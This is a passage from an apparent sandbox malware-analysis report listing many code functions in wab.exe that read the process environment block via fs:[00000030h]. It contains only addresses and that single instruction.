Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4132D mov eax, dword ptr fs:[00000030h]	26_2_21D4132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAB2C0 mov eax, dword ptr fs:[00000030h]	26_2_21CAB2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAB2C0 mov eax, dword ptr fs:[00000030h]	26_2_21CAB2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAB2C0 mov eax, dword ptr fs:[00000030h]	26_2_21CAB2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAB2C0 mov eax, dword ptr fs:[00000030h]	26_2_21CAB2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAB2C0 mov eax, dword ptr fs:[00000030h]	26_2_21CAB2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAB2C0 mov eax, dword ptr fs:[00000030h]	26_2_21CAB2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAB2C0 mov eax, dword ptr fs:[00000030h]	26_2_21CAB2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8A2C3 mov eax, dword ptr fs:[00000030h]	26_2_21C8A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8A2C3 mov eax, dword ptr fs:[00000030h]	26_2_21C8A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8A2C3 mov eax, dword ptr fs:[00000030h]	26_2_21C8A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8A2C3 mov eax, dword ptr fs:[00000030h]	26_2_21C8A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8A2C3 mov eax, dword ptr fs:[00000030h]	26_2_21C8A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C892C5 mov eax, dword ptr fs:[00000030h]	26_2_21C892C5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C892C5 mov eax, dword ptr fs:[00000030h]	26_2_21C892C5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7B2D3 mov eax, dword ptr fs:[00000030h]	26_2_21C7B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7B2D3 mov eax, dword ptr fs:[00000030h]	26_2_21C7B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7B2D3 mov eax, dword ptr fs:[00000030h]	26_2_21C7B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAF2D0 mov eax, dword ptr fs:[00000030h]	26_2_21CAF2D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAF2D0 mov eax, dword ptr fs:[00000030h]	26_2_21CAF2D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C902E1 mov eax, dword ptr fs:[00000030h]	26_2_21C902E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C902E1 mov eax, dword ptr fs:[00000030h]	26_2_21C902E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C902E1 mov eax, dword ptr fs:[00000030h]	26_2_21C902E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D3F2F8 mov eax, dword ptr fs:[00000030h]	26_2_21D3F2F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D552E2 mov eax, dword ptr fs:[00000030h]	26_2_21D552E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C792FF mov eax, dword ptr fs:[00000030h]	26_2_21C792FF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]	26_2_21D312ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]	26_2_21D312ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]	26_2_21D312ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]	26_2_21D312ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]	26_2_21D312ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]	26_2_21D312ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]	26_2_21D312ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]	26_2_21D312ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]	26_2_21D312ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]	26_2_21D312ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]	26_2_21D312ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]	26_2_21D312ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]	26_2_21D312ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]	26_2_21D312ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBE284 mov eax, dword ptr fs:[00000030h]	26_2_21CBE284
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBE284 mov eax, dword ptr fs:[00000030h]	26_2_21CBE284
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D00283 mov eax, dword ptr fs:[00000030h]	26_2_21D00283
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D00283 mov eax, dword ptr fs:[00000030h]	26_2_21D00283
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D00283 mov eax, dword ptr fs:[00000030h]	26_2_21D00283
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB329E mov eax, dword ptr fs:[00000030h]	26_2_21CB329E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB329E mov eax, dword ptr fs:[00000030h]	26_2_21CB329E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D55283 mov eax, dword ptr fs:[00000030h]	26_2_21D55283
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C902A0 mov eax, dword ptr fs:[00000030h]	26_2_21C902A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C902A0 mov eax, dword ptr fs:[00000030h]	26_2_21C902A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C952A0 mov eax, dword ptr fs:[00000030h]	26_2_21C952A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C952A0 mov eax, dword ptr fs:[00000030h]	26_2_21C952A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C952A0 mov eax, dword ptr fs:[00000030h]	26_2_21C952A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C952A0 mov eax, dword ptr fs:[00000030h]	26_2_21C952A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D092BC mov eax, dword ptr fs:[00000030h]	26_2_21D092BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D092BC mov eax, dword ptr fs:[00000030h]	26_2_21D092BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D092BC mov ecx, dword ptr fs:[00000030h]	26_2_21D092BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D092BC mov ecx, dword ptr fs:[00000030h]	26_2_21D092BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D162A0 mov eax, dword ptr fs:[00000030h]	26_2_21D162A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D162A0 mov ecx, dword ptr fs:[00000030h]	26_2_21D162A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D162A0 mov eax, dword ptr fs:[00000030h]	26_2_21D162A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D162A0 mov eax, dword ptr fs:[00000030h]	26_2_21D162A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D162A0 mov eax, dword ptr fs:[00000030h]	26_2_21D162A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D162A0 mov eax, dword ptr fs:[00000030h]	26_2_21D162A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D172A0 mov eax, dword ptr fs:[00000030h]	26_2_21D172A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D172A0 mov eax, dword ptr fs:[00000030h]	26_2_21D172A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D3B256 mov eax, dword ptr fs:[00000030h]	26_2_21D3B256
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D3B256 mov eax, dword ptr fs:[00000030h]	26_2_21D3B256
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB724D mov eax, dword ptr fs:[00000030h]	26_2_21CB724D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C79240 mov eax, dword ptr fs:[00000030h]	26_2_21C79240
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C79240 mov eax, dword ptr fs:[00000030h]	26_2_21C79240
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C86259 mov eax, dword ptr fs:[00000030h]	26_2_21C86259
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D08243 mov eax, dword ptr fs:[00000030h]	26_2_21D08243
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D08243 mov ecx, dword ptr fs:[00000030h]	26_2_21D08243
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7A250 mov eax, dword ptr fs:[00000030h]	26_2_21C7A250
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]	26_2_21D30274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]	26_2_21D30274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]	26_2_21D30274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]	26_2_21D30274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]	26_2_21D30274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]	26_2_21D30274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]	26_2_21D30274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]	26_2_21D30274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]	26_2_21D30274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]	26_2_21D30274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]	26_2_21D30274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]	26_2_21D30274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C84260 mov eax, dword ptr fs:[00000030h]	26_2_21C84260
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C84260 mov eax, dword ptr fs:[00000030h]	26_2_21C84260
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C84260 mov eax, dword ptr fs:[00000030h]	26_2_21C84260
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7826B mov eax, dword ptr fs:[00000030h]	26_2_21C7826B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC1270 mov eax, dword ptr fs:[00000030h]	26_2_21CC1270
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC1270 mov eax, dword ptr fs:[00000030h]	26_2_21CC1270
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA9274 mov eax, dword ptr fs:[00000030h]	26_2_21CA9274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB7208 mov eax, dword ptr fs:[00000030h]	26_2_21CB7208
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB7208 mov eax, dword ptr fs:[00000030h]	26_2_21CB7208
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D55227 mov eax, dword ptr fs:[00000030h]	26_2_21D55227
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7823B mov eax, dword ptr fs:[00000030h]	26_2_21C7823B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D535D7 mov eax, dword ptr fs:[00000030h]	26_2_21D535D7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D535D7 mov eax, dword ptr fs:[00000030h]	26_2_21D535D7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D535D7 mov eax, dword ptr fs:[00000030h]	26_2_21D535D7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBE5CF mov eax, dword ptr fs:[00000030h]	26_2_21CBE5CF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBE5CF mov eax, dword ptr fs:[00000030h]	26_2_21CBE5CF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB55C0 mov eax, dword ptr fs:[00000030h]	26_2_21CB55C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA95DA mov eax, dword ptr fs:[00000030h]	26_2_21CA95DA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C865D0 mov eax, dword ptr fs:[00000030h]	26_2_21C865D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBA5D0 mov eax, dword ptr fs:[00000030h]	26_2_21CBA5D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBA5D0 mov eax, dword ptr fs:[00000030h]	26_2_21CBA5D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D555C9 mov eax, dword ptr fs:[00000030h]	26_2_21D555C9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CFD5D0 mov eax, dword ptr fs:[00000030h]	26_2_21CFD5D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CFD5D0 mov ecx, dword ptr fs:[00000030h]	26_2_21CFD5D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBC5ED mov eax, dword ptr fs:[00000030h]	26_2_21CBC5ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBC5ED mov eax, dword ptr fs:[00000030h]	26_2_21CBC5ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C825E0 mov eax, dword ptr fs:[00000030h]	26_2_21C825E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB4588 mov eax, dword ptr fs:[00000030h]	26_2_21CB4588
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0B594 mov eax, dword ptr fs:[00000030h]	26_2_21D0B594
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0B594 mov eax, dword ptr fs:[00000030h]	26_2_21D0B594
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7758F mov eax, dword ptr fs:[00000030h]	26_2_21C7758F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7758F mov eax, dword ptr fs:[00000030h]	26_2_21C7758F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7758F mov eax, dword ptr fs:[00000030h]	26_2_21C7758F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C82582 mov eax, dword ptr fs:[00000030h]	26_2_21C82582
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C82582 mov ecx, dword ptr fs:[00000030h]	26_2_21C82582
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBE59C mov eax, dword ptr fs:[00000030h]	26_2_21CBE59C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA15A9 mov eax, dword ptr fs:[00000030h]	26_2_21CA15A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA15A9 mov eax, dword ptr fs:[00000030h]	26_2_21CA15A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA15A9 mov eax, dword ptr fs:[00000030h]	26_2_21CA15A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA15A9 mov eax, dword ptr fs:[00000030h]	26_2_21CA15A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA15A9 mov eax, dword ptr fs:[00000030h]	26_2_21CA15A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D135BA mov eax, dword ptr fs:[00000030h]	26_2_21D135BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D135BA mov eax, dword ptr fs:[00000030h]	26_2_21D135BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D135BA mov eax, dword ptr fs:[00000030h]	26_2_21D135BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D135BA mov eax, dword ptr fs:[00000030h]	26_2_21D135BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D3F5BE mov eax, dword ptr fs:[00000030h]	26_2_21D3F5BE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D005A7 mov eax, dword ptr fs:[00000030h]	26_2_21D005A7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D005A7 mov eax, dword ptr fs:[00000030h]	26_2_21D005A7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D005A7 mov eax, dword ptr fs:[00000030h]	26_2_21D005A7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA45B1 mov eax, dword ptr fs:[00000030h]	26_2_21CA45B1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA45B1 mov eax, dword ptr fs:[00000030h]	26_2_21CA45B1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C88550 mov eax, dword ptr fs:[00000030h]	26_2_21C88550
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C88550 mov eax, dword ptr fs:[00000030h]	26_2_21C88550
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB656A mov eax, dword ptr fs:[00000030h]	26_2_21CB656A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB656A mov eax, dword ptr fs:[00000030h]	26_2_21CB656A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB656A mov eax, dword ptr fs:[00000030h]	26_2_21CB656A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7B562 mov eax, dword ptr fs:[00000030h]	26_2_21C7B562
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBB570 mov eax, dword ptr fs:[00000030h]	26_2_21CBB570
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBB570 mov eax, dword ptr fs:[00000030h]	26_2_21CBB570
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB7505 mov eax, dword ptr fs:[00000030h]	26_2_21CB7505
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB7505 mov ecx, dword ptr fs:[00000030h]	26_2_21CB7505
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D54500 mov eax, dword ptr fs:[00000030h]	26_2_21D54500
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D54500 mov eax, dword ptr fs:[00000030h]	26_2_21D54500
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D54500 mov eax, dword ptr fs:[00000030h]	26_2_21D54500
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D54500 mov eax, dword ptr fs:[00000030h]	26_2_21D54500
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D54500 mov eax, dword ptr fs:[00000030h]	26_2_21D54500
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D54500 mov eax, dword ptr fs:[00000030h]	26_2_21D54500
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D54500 mov eax, dword ptr fs:[00000030h]	26_2_21D54500
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D55537 mov eax, dword ptr fs:[00000030h]	26_2_21D55537
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D2F525 mov eax, dword ptr fs:[00000030h]	26_2_21D2F525
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D2F525 mov eax, dword ptr fs:[00000030h]	26_2_21D2F525
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D2F525 mov eax, dword ptr fs:[00000030h]	26_2_21D2F525
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D2F525 mov eax, dword ptr fs:[00000030h]	26_2_21D2F525
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D2F525 mov eax, dword ptr fs:[00000030h]	26_2_21D2F525
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D2F525 mov eax, dword ptr fs:[00000030h]	26_2_21D2F525
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D2F525 mov eax, dword ptr fs:[00000030h]	26_2_21D2F525
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBD530 mov eax, dword ptr fs:[00000030h]	26_2_21CBD530
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBD530 mov eax, dword ptr fs:[00000030h]	26_2_21CBD530
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D3B52F mov eax, dword ptr fs:[00000030h]	26_2_21D3B52F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8D534 mov eax, dword ptr fs:[00000030h]	26_2_21C8D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8D534 mov eax, dword ptr fs:[00000030h]	26_2_21C8D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8D534 mov eax, dword ptr fs:[00000030h]	26_2_21C8D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8D534 mov eax, dword ptr fs:[00000030h]	26_2_21C8D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8D534 mov eax, dword ptr fs:[00000030h]	26_2_21C8D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8D534 mov eax, dword ptr fs:[00000030h]	26_2_21C8D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C90535 mov eax, dword ptr fs:[00000030h]	26_2_21C90535
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C90535 mov eax, dword ptr fs:[00000030h]	26_2_21C90535
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C90535 mov eax, dword ptr fs:[00000030h]	26_2_21C90535
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C90535 mov eax, dword ptr fs:[00000030h]	26_2_21C90535
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C90535 mov eax, dword ptr fs:[00000030h]	26_2_21C90535
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C90535 mov eax, dword ptr fs:[00000030h]	26_2_21C90535
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D554DB mov eax, dword ptr fs:[00000030h]	26_2_21D554DB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C804E5 mov ecx, dword ptr fs:[00000030h]	26_2_21C804E5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7B480 mov eax, dword ptr fs:[00000030h]	26_2_21C7B480
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C89486 mov eax, dword ptr fs:[00000030h]	26_2_21C89486
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C89486 mov eax, dword ptr fs:[00000030h]	26_2_21C89486
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C864AB mov eax, dword ptr fs:[00000030h]	26_2_21C864AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB34B0 mov eax, dword ptr fs:[00000030h]	26_2_21CB34B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB44B0 mov ecx, dword ptr fs:[00000030h]	26_2_21CB44B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D3F453 mov eax, dword ptr fs:[00000030h]	26_2_21D3F453
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8B440 mov eax, dword ptr fs:[00000030h]	26_2_21C8B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8B440 mov eax, dword ptr fs:[00000030h]	26_2_21C8B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8B440 mov eax, dword ptr fs:[00000030h]	26_2_21C8B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8B440 mov eax, dword ptr fs:[00000030h]	26_2_21C8B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8B440 mov eax, dword ptr fs:[00000030h]	26_2_21C8B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8B440 mov eax, dword ptr fs:[00000030h]	26_2_21C8B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBE443 mov eax, dword ptr fs:[00000030h]	26_2_21CBE443
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBE443 mov eax, dword ptr fs:[00000030h]	26_2_21CBE443
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBE443 mov eax, dword ptr fs:[00000030h]	26_2_21CBE443
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBE443 mov eax, dword ptr fs:[00000030h]	26_2_21CBE443
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBE443 mov eax, dword ptr fs:[00000030h]	26_2_21CBE443
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBE443 mov eax, dword ptr fs:[00000030h]	26_2_21CBE443
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBE443 mov eax, dword ptr fs:[00000030h]	26_2_21CBE443
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBE443 mov eax, dword ptr fs:[00000030h]	26_2_21CBE443
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA245A mov eax, dword ptr fs:[00000030h]	26_2_21CA245A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7645D mov eax, dword ptr fs:[00000030h]	26_2_21C7645D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C81460 mov eax, dword ptr fs:[00000030h]	26_2_21C81460
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C81460 mov eax, dword ptr fs:[00000030h]	26_2_21C81460
